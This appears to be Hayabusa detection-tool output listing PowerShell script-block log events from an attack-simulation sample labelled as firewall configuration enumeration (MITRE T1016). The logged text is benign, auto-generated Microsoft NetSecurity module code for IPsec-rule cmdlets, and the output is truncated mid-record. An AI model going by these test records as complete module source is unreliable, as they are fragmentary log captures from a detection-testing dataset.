[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')]",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.754 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName 
)) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) 
$__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 
'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.754 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and 
(@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 
'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP 
NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecRule' function Enable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, 
